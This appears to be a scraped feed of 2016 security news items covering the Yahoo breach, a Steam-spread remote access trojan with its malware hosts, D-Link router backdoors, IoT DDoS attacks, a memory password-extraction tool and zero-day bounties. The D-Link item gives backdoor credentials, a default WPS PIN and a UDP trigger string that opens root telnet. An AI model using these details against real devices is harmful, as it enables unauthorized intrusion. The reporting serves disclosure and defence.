Uh oh, Yahoo! Data Breach May Have Hit Over 1 Billion Users

The massive data breach that Yahoo! confirmed to the world last week is claimed by the company to have been carried out by a "state-sponsored actor" in 2014, which exposed the accounts of at least 500 Million Yahoo users. But, now it seems that Yahoo has downplayed a mega data breach and triying to hide it's own security blunder. Recently the information security firm InfoArmor that analyzed

Watch out, hacked Steam accounts used as an attack vector

Malware researcher discovered a Reddit user which is warning of the existence of hacked Steam accounts used to spread a Remote Access Trojan (RAT).

This week the popular malware researcher  from Bleepingcomputer.com has found a worrisome message on Reddit. The Reddit user with the moniker Haydaddict was warning of the existence of compromised Steam accounts spreading a Remote Access Trojan (RAT).

“Quinn Lobdell hacked on Steam. Please be aware if others try to send you sketchy links. Scrub Killa and Jessie affected as well.” reads the post.

The accounts were used to send chat messages containing links to videomeo.pw to watch a video.

Hacked Steam accounts

“When the target went to the page, they would be greeted with a message stating that they needed to update Flash Player in order to watch the video.” explained Lawrence Abrams in a blog post.

Hacked Steam accounts

The trick is quite simple and leverages on the user’s curiosity when it downloads and executes the Flash Player installer apparently nothing happens, but in reality the victim has opened its machine to the attacker.

The Flash Player installer executes a PowerShell script (zaga.ps1) that downloads a 7-zip archive, 7-zip extractor, and a CMD script from a remote server (http://zahr[.]pw).

The PowerShell then launches the CMD file, which extracts the sharchivedmngr to the %AppData%\lappclimtfldr folder and configures Windows to automatically start an instance of the NetSupport Manager Remote Control Software, renamed as mcrtvclient.exe, when the victim logs in.

When the victims will log in the infected machine, the NetSupport Manager will connect to the NetSupport gateway at leyv.pw:11678 and await commands, at this point the attacker has complete control over the victim’s machine.

“For those who are concerned they are infected with this Steam Trojan, I suggest they check the %AppData% folder for the specified folders.” suggests Lawrence Abrams in order to check if the system is compromised.

Every time you visit a link be careful, and make sure to have installed up to date defense solutions.

Pierluigi Paganini

(Security Affairs – Hacked Steam accounts, malware)

The post Watch out, hacked Steam accounts used as an attack vector appeared first on Security Affairs.

D-Link DWR-932 B LTE Wireless router affected by multiple backdoors

If you have a D-Link DWR-932 B LTE Wireless router you need to know that it is affected by more that 20 security issues, including backdoor accounts.

D-Link ‘s DWR-932B LTE router and access point has been found vulnerable to a number of backdoors as well as a default WPS (Wi-Fi Protected Setup) PIN.

Security researcher and blogger, Pierre Kim, has uncovered a number of security flaws in the device that even affect the latest version of its firmware.

Kim had previously released a number of flaws that existed in the LTE QDH routers made by Quanta and it appears that they also appear in D-Link models.

Among the various vulnerabilities the researcher discovered that two backdoor accounts which can be used to bypass HTTP authentication include the admin account with the username and password ‘admin’ as well as a root account using the password ‘1234’.

The D-Link DWR-932 B also contains a default WPS PIN of 28296607 which is hard coded in the /bin/appmgr directory. It’s also located in the HostAP and HTTP API’s configurations.

The /bin/appmgr program also allows malicious attackers to send a specific string via UDP which forces the device to start a telnet service which operates without authentication. This can occur even in the telnet service isn’t already running. If HELODBC is sent as a command to 0.0.0.0:39889 over UDP the router allows unauthenticated access using the root account.

Both /etc/inadyn-mt.conf and /bin/qmiweb contain various vulnerabilities, the conf file contains a username with hardcoded password and the http daemon in qmiweb has multiple possible routes for exploit.

d-link-dwr-932

Kim also discovered that the credentials for using the FOTA (Firmware Over The Air) service contained hard-coded user credentials in the /sbin/fotad binary, there is an added degree of security with the daemon attempting to download the firmware over HTTPS, however the SSL certificate for this service has been invalid for over 18 months.

It was also found that the security level of the UPNP program (miniupnp) in the router is lowered, thus allowing a LAN based attacker the ability to add Port forwarding from the Internet to other local clients

“There is no restriction about the UPnP permission rules in the configuration file, contrary to common usage in UPnP where it is advised to only allow redirection of port above 1024,” explained Kim.

This would allow attackers to forward traffic from the outside onto the local network, including services such as mail, file transfer, and database, posing a huge number of vehicles as Advanced Persistent Threats.

Kim informed D-Link of the issues in the D-Link DWR-932 devices back in June of this year but to date still hasn’t received any notification confirming that they have been resolved. Following 90 days of silence from D-Link, Kim has now chosen to publish an advisory revealing the bugs.

D-Link patched a number of flaws in August following the discovery of a weakness in a number of DIR model routers after a D-Link Wi-Fi camera was found to be affected by a vulnerability that later proved to be present in over 120 of their products.

Written by: Steven Boyd

Steven Boyd

Steven is a security consultant, researcher, ethical hacker and freelance writer with over 16 years of experience in the industry. He has provided security consultancy to some of the world’s biggest banks, the private sector as well as public services and defense. He is the owner and creator of security blog www.CybrViews.com.

Twitter: @CybrViews

 

 

Pierluigi Paganini

(Security Affairs – D-Link DWR-932, Hacking)

The post D-Link DWR-932 B LTE Wireless router affected by multiple backdoors appeared first on Security Affairs.

The Good, the Bad and the Ugly - DDoS Attacks in the Era of IoT

CCTV_Cameras

Starting September 21, renowned security blogger Brian Krebs came under what would turn out to be one of the largest DDoS attacks to date. With the attack reportedly reaching a peak 620 gigabits per second (Gbps), and being sustained over a number of days. It took a significant toll, and in the end forced the reporter to choose between changing hosts or shutting his blog down completely.

It appears that the Internet of Things (IoT) played a prominent role in this DDoS attack, and is seen as having an increasing role in DDoS attacks overall. On the macro level, the IoT brings with it good. It provides us new services that improve our everyday lives. However technology has its bad side, in this case it is the inherent weakness built into the IoT by virtue of little, even non-existent security.

The ability to conduct DDoS attacks is premised on a hacker’s ability to infect a large number of endpoints, turn the average computer into a zombie, and use it in a botnet army. While there are numerous methods for infecting computers from phishing schemes such as using malicious links to drive-by downloads, infected USB sticks and more, it still requires both cost and effort to build a botnet, add to its ranks, foster its growth, and conduct the attacks themselves.

This is because most computer endpoints have some form of anti-virus or anti-malware technology on them with varying degrees of effectiveness, and it typically requires human intervention to open the door and infect the endpoint. The birth and ongoing development of IoT is changing that equation. Most IoT devices have no built-in security besides a password, and as Imperva discovered while researching an attack conducted via IoT devices -CCTV cameras - the devices were all accessible via their default password. Furthermore, these devices typically provide remote access to users through default ports such as HTTP:80 that are easily discovered and which link the public domain to the local CCTV network.

Many IoT device users don’t change default credentials, which makes the work of bad actors much easier. To discover the IoT devices, hackers need only use a search engine for internet-connected devices such as Shodan. Next, they attempt to access the devices with default credentials or use brute-force attacks to try and compromise the devices and infect them with malware.

In the case of CCTV devices, they are usually managed by a stand-alone DVR server which typically doesn’t have anti-malware protection. So once infected, the likelihood of the malware being removed from a DVR server is close to zero. Additionally, once installed these devices are almost never updated (OS fixes, BIOS updates, etc.). This all results in a very stable and cost-effective botnet. It is also likely that the outbound connection of these servers has a reasonably high bandwidth (greater than 1Mbps), contributing to the ability of hackers to ramp up the size of their DDoS attacks.

And then there’s the ugly. The Imperva report noted above mentions that in 2014 there were 245 million surveillance cameras operating around the world. Forecasts for the coming years project anywhere between 10 and 28 billion connected devices will come online by 2021. The proliferation of IoT devices and apparent ease of their compromise is making them an effective tool in the arsenal of hackers.

As billions of IoT devices come online in the years ahead each with their own security challenges, the drafting of these devices into botnets will surge. What we are seeing now, could be just the tip of the iceberg. This reduces the cost of launching and maintaining DDoS attacks while contributing to their size, and making it more challenging for DDoS protection providers to defend against them. It could be speculated that the record-breaking size of recent DDoS attacks may be at least partially attributed to burgeoning adoption of IoT devices and their availability to hackers who use them in these attacks. Further adding to this scourge is another threat, that of infected mobile devices as reported in this Imperva blog.

The result is clear; attacks are scaling larger on an almost daily basis due to an expanding mix of available devices from which to launch them. Even as these words are being written, today’s “Largest DDoS attack ever” has become a footnote, with a just off the presses report of a 1 Tera bit per second (Tbps) DDoS attack of French web hosting firm OVH.com, that’s 66% larger than the attack on Krebs.

Concern has increased to the point that Homeland Security has just issued a call to action on IoT security. In the meantime, Brian Krebs has apparently found sanctuary thanks to Google’s Project Shield.

The challenge of DDoS protection providers is to stay ahead of bad actors and scale to meet the needs of ever increasing and sophisticated attacks, while being able to continue to protect their customers at a reasonable price, under any conditions. The increasing size of IoT will likely play an ever increasing role in the epic battle between hackers and defenders. The stakes as we can see are growing. Today hackers can shut down a journalist. Tomorrow they’ll be able to shut down hospitals, power plants, communications infrastructure and play a central role in warfare.

Don't wait until your organization gets shut down by hackers. Register here for our webinar on how to protect yourself from Multi-layered DDoS attacks. 

To view the latest Imperva DDoS Threat Landscape Report, visit https://www.incapsula.com/ddos-report/ddos-report-q1-2016.html.

 

Japanese man arrested for selling jailbroken iPhones

He allegedly sold iPhones with a difference - pre-jailbroken and loaded with a popular game hacked to have handy powerups built in...

mimikittenz – Extract Plain-Text Passwords From Memory

mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes. The aim of mimikittenz is to provide user-level (non-admin privileged) sensitive data extraction in order to maximise post exploitation efforts and increase value of...

Read the full post at darknet.org.uk

Zero day broker firm Zerodium has tripled iOS exploit bounty to $1.5M

The notorious zero-day broker company Zerodium has raised the value for a remote IOS jailbreak that reached $1.5 million.

The popular zero-day broker Zerodium, which is specialized in Buys and Sells zero-day exploits, has tripled the bug bounty for a remote iOS 10 exploit. The company is willing to pay a jailbreak vulnerability to US$1.5 million.

Zerodium first offered a bug bounty of US$500,000 for remote iOS 9 jailbreaks, the company then rewarded US$1 million to a group of hackers for disclosing a iOS zero-day vulnerability that could allow an attacker to remotely hack any Phone.

Last offer demonstrates the intent of the company to attract bug hunters to develop remote iOS jailbreaks. Of course behind the decision of the firm, there is a significant increase in the demand for zero-day exploits for both Apple and Android mobile platforms as confirmed by the Zerodium CEO Chaouki Bekrar.

Zerodium also announced to have doubled rewards for remote rooting flaws on the most recent Android versions, Marshmallow and Nougat, the company is willing to pay US$200,000.

Below the payout table disclosed by the Zerodium firm.

zerodium-zero-day-pricelist

 

Zero-day exploits are valuable commodities in the hacking underground, several governments have dedicated cyber units to the discovery and exploitation of unknown vulnerabilities, but in some cases, they are sold by private entities in the criminal underground.

The rewards offered by the zero-day brokers are greater than the payouts of the vendors of the vulnerable products.

In the case of Apple for example, the awards are lower than Zerodium, bug hunters can earn up to $200,000 for a critical vulnerability affecting the secure boot firmware components, up to $100,000 for a flaw that could be exploit to extract sensitive data protected by the Secure Enclave, up to $50,000 for arbitrary code execution with kernel privileges and unauthorized access to iCloud account data, and up to $25,000 for access from a sandboxed process to user data outside the sandbox.

Pierluigi Paganini

(Security Affairs – bug bounty program, Hacking)

The post Zero day broker firm Zerodium has tripled iOS exploit bounty to $1.5M appeared first on Security Affairs.

Penetration Testing: Job Knowledge & Professional Development

Interested in starting a career in penetration testing? This is actually a good time to get in the field, as security has taken center stage in the IT activities of all companies and organizations and there is a demand for trained and competent pen testing experts. To join the ranks of pen testers and white-hat […]

The post Penetration Testing: Job Knowledge & Professional Development appeared first on InfoSec Resources.

Security Barriers in the Adaptation of Cloud Technology

Cloud computing adoption continues accelerating; research by IDG found that 69% of enterprises have either applications or infrastructures running in the cloud. As organizations are adopting cloud systems, it’s creating another security threat for the future. As far as the security is concerned, many organizations don’t trust or rely on cloud systems. They are afraid […]

The post Security Barriers in the Adaptation of Cloud Technology appeared first on InfoSec Resources.

Facebook, Google, Amazon, Microsoft and IBM team up on AI

The group says it wants to ensure that AI benefits as many people as possible